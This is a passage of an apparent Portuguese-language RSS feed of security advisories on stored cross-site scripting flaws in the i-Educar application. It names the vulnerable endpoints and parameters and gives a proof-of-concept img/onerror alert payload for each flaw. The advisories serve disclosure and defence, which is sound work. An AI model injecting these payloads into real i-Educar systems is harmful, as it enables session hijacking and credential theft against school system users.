    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9723</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9723/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9723/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9723-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_regime_cadphp-parâmetro-nm_tipo&amp;#34;&amp;gt;CVE-2025-9723: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_tipo_regime_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9723-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_regime_cadphp-parâmetro-nm_tipo&amp;#34;&amp;gt;CVE-2025-9723: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_tipo_regime_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9723/image.png&amp;#34;
	width=&amp;#34;579&amp;#34;
	height=&amp;#34;228&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9723/image_hu_30ee5bc94558a46c.png 480w, /p/cve-2025-9723/image_hu_d033cd6d8b8c0c81.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;253&amp;#34;
		data-flex-basis=&amp;#34;609px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9724</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9724/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9724/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9724-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_nivel_ensino_cadphp&amp;#34;&amp;gt;CVE-2025-9724: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9724-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_nivel_ensino_cadphp&amp;#34;&amp;gt;CVE-2025-9724: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9724&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_nivel_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_nivel&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9724/image.png&amp;#34;
	width=&amp;#34;572&amp;#34;
	height=&amp;#34;212&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9724/image_hu_f1ad93c28c15da33.png 480w, /p/cve-2025-9724/image_hu_82e5db05c0ce4244.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;269&amp;#34;
		data-flex-basis=&amp;#34;647px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9724/image-1.png&amp;#34;
	width=&amp;#34;572&amp;#34;
	height=&amp;#34;223&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9724/image-1_hu_d0f78472b39dbbb3.png 480w, /p/cve-2025-9724/image-1_hu_1f1d3d37f56155fa.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;256&amp;#34;
		data-flex-basis=&amp;#34;615px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9738</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9738/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9738/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9738-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ensino_cadphp-parâmetro-nm_tipo&amp;#34;&amp;gt;CVE-2025-9738: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9738-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ensino_cadphp-parâmetro-nm_tipo&amp;#34;&amp;gt;CVE-2025-9738: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9738&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
